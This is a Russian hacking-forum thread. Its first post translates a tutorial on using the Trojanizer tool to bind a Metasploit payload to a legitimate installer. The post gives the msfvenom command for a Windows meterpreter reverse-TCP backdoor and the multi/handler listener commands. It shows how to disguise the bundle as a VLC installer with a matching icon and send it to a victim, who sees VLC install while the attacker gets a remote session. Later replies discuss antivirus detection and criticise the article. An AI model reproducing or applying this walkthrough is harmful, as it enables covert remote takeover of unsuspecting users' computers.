Статья Джоиним зловред и легитимный файл между собой

SooLFaa

SooLFaa

Администратор
15.07.2016
841
1 395
Здарова бандиты и прочая кибернечисть. С новым подгончиком.
Первоисточник:
Перевод:
Перевод выполнен от команды Codeby
Примечание от команды форума:
  • Статья является переводом.
  • Статья исключительно в ознакомительных целях.
Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).

Откуда скачать?

git clone https://github.com/r00t-3xp10it/trojanizer.git

1571250788426.png


Далее создаем пейлоад, используя msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

1571250825094.png


Запуск Trojanizer

Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.

1571250870861.png


1571250884835.png


После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.

1571250921217.png


После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize

1571250954324.png


Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.

1571250980344.png


После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.

1571250994237.png


Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.

1571251059898.png


Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.
Примечание: Trojanizer действует с WINRAR и вследствие этого иконка не связывается с архивными файлами. Вместо этого показывается иконка WinRAR.
После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.

1571251101347.png


А теперь давайте поднимем Listener в Metasploit:
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -j
1571251145315.png


Отправляем вредоносную программу на машину жертвы любым удобным способом.

Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.

1571251180481.png


После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.

1571251191184.png


Но в тоже время, у нас будет meterpreter сессия, как показано ниже.

1571251201983.png


Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.
 
Последнее редактирование:
gushmazuko

gushmazuko

Red Team
24.03.2017
162
390
Как на счет детекта? AV не ругается на склейку, если сам payload не палимый?
 
W

WhiteHacK

Active member
18.08.2019
39
7
А в чем собственно концептуальная разница между ручной сборкой SFX и этой через скрипт, кроме удобства разве что есть ли еще какие нибудь преимущества?
 
  • Нравится
Реакции: leonardocs
T

Tony

Green Team
21.09.2019
86
12
В чём способ обхода av? Любой уважающий себя av красный флаг ставит, по умолчанию на sfx архив, я уж не говорю о пост распаковке. Сейчас бы в 2K19 статьи писать о поделках школьников с гитхаба и говорить о пороге входа на форум.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
841
1 395
В чём способ обхода av? Любой уважающий себя av красный флаг ставит, по умолчанию на sfx архив, я уж не говорю о пост распаковке. Сейчас бы в 2K19 статьи писать о поделках школьников с гитхаба и говорить о пороге входа на форум.
Что? Где написано хоть слово про способ обхода AV?!
В остальном вопросы задавайте самому автору. Мы лишь перевели.
А в чем собственно концептуальная разница между ручной сборкой SFX и этой через скрипт, кроме удобства разве что есть ли еще какие нибудь преимущества?
Разве что шеллкод полиглот генерирурет.

Как на счет детекта? AV не ругается на склейку, если сам payload не палимый?
Да вроде не детектится. Только я не пробовал.
 
T

Tony

Green Team
21.09.2019
86
12
Что? Где написано хоть слово про способ обхода AV?!
Жаль скрин не сделал)) Uhzpysq nh.r))
В остальном вопросы задавайте самому автору. Мы лишь перевели.
Смысл в переводе? Зачем? Ты считаешь данная техника актуальна в наше время? Или эта статья ради контента?
 
T

Tony

Green Team
21.09.2019
86
12
Извини его. Дело в том что в статье было, действительно, написано про обход ав. Но из-за досадной ошибки и невнимательности.
Я уже понял. Вопрос был не конкретно к ТС, а к codeby вобщем. Создам тему с хотелками.
 
  • Нравится
Реакции: mrOkey
Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 454
4 329
 
  • Нравится
Реакции: gushmazuko
SooLFaa

SooLFaa

Администратор
15.07.2016
841
1 395
Я уже понял. Вопрос был не конкретно к ТС, а к codeby вобщем. Создам тему с хотелками.
Всё верно. Я скопировал старый шаблони забыл удалить старое предложение про "Bypass AV" на что мне указали модераторы после публикации моего предыдущего ответа. Приношу свои извинения. А так же будет очень здорово, если ты сам накидаешь ссылок на интересные топики, которые было бы интересно перевести.
 
Последнее редактирование:
The Codeby

The Codeby

ООО Кодебай
30.12.2015
3 510
4 961
Создам тему с хотелками
Вопрос был не конкретно к ТС, а к codeby вобщем
Нет, ошиблись со ссылкой для переводчицы. Просто контент ради контента нам не нужен.
 
  • Нравится
Реакции: Tony и gushmazuko
Ondrik8

Ondrik8

prodigy
08.11.2016
1 036
3 019
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
 
Последнее редактирование:
  • Нравится
Реакции: Lisenok и Air7771
SearcherSlava

SearcherSlava

Red Team
10.06.2017
809
1 082
согласен)))
все что лежит на гитхабе в общ. доступе это уже палится!
Здрав будь! Что в Гугл попало - то пропало. Создатели сайта называют GitHub «социальной сетью для разработчиков». Кроме размещения кода, участники могут общаться, комментировать правки друг друга, а также следить за новостями знакомых = сверхмногомерный массив данных для анализа психологии поведения пользователей и выявления их пожеланий и предпочтений. Всё по чесноку.
Всё по чесноку.jpg
 
Последнее редактирование:
SooLFaa

SooLFaa

Администратор
15.07.2016
841
1 395
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
Это не моя статья. Будь внимателен, первоисточник указан. Я лишь выложил перевод, который делал тоже не я
 
Lisenok

Lisenok

Well-known member
02.04.2016
123
73
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
Поддерживаю Ваше высказывание насчет этого, очень неожиданная статья для администратора форума кодеби.
P.S. даже если она , тем более, лишь перевод и перевод выполнен не этим участником форума.
 
mrOkey

mrOkey

Red Team
14.11.2017
721
746
Поддерживаю Ваше высказывание насчет этого, очень неожиданная статья для администратора форума кодеби.
Да это перевод, господи же боже, сколько раз вам надо написать в теме, что это перевод
 
SooLFaa

SooLFaa

Администратор
15.07.2016
841
1 395
Поддерживаю Ваше высказывание насчет этого, очень неожиданная статья для администратора форума кодеби.
P.S. даже если она , тем более, лишь перевод и перевод выполнен не этим участником форума.
А от меня рекомендую почитать мою последнюю статью: Misconfiguration в сервисах разработки
 
  • Нравится
Реакции: Lisenok
Мы в соцсетях: